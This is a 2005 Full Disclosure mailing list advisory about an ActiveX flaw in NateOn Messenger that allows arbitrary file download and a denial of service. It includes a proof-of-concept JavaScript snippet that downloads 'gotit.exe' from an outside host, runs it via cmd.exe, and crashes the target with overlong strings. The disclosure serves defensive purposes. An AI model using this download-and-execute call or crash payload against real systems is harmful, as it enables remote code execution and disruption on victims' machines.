Full Disclosure mailing list archives
[NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS
From: "saintlinu" <saintlinu () yahoo co kr>
Date: Thu, 29 Sep 2005 11:36:27 +0800
Title: Arbitrary File Download by NateOn Messagener's ActiveX and DoS Discoverer: PARK, GYU TAE (saintlinu () null2root org) Advisory No.: NRVA05-08 Critical: Moderately Critical Impact: Arbitrary file download by NateOn Messagener's ActiveX and DoS Where: From remote Operating System: Windows Only Solution: unpatch yet Workaround: N / A Notice: 09. 17. 2005 Initiate notified 09. 23. 2005 2nd notified 09. 27. 2005 3rd notified 09. 29. 2005 Vendor didn't response. Disclosure vulnerability Description: The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such as MSN, YAHOO and so on If installed NateOn Messenger then can exploit by 'NateonDownloadManager.ocx' ActiveX and there is another vulnerability like Buffer Overflow See following detail describe: NOT INCLUDED HERE BUT A PIECE OF CODE <--snip--> i = GotNate.IsNateonInstall(); if( i == 1 ) { alert('NateOn Messenger already installed. Do Attack ...'); // if you want to second order attack then try i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\ system32\\cmd.exe'); // if you want to crash to victim system the try i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str ings_in_here'); } else { alert('NateOn Messenger NOT Installed'); } </--snip-->
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS saintlinu (Sep 28)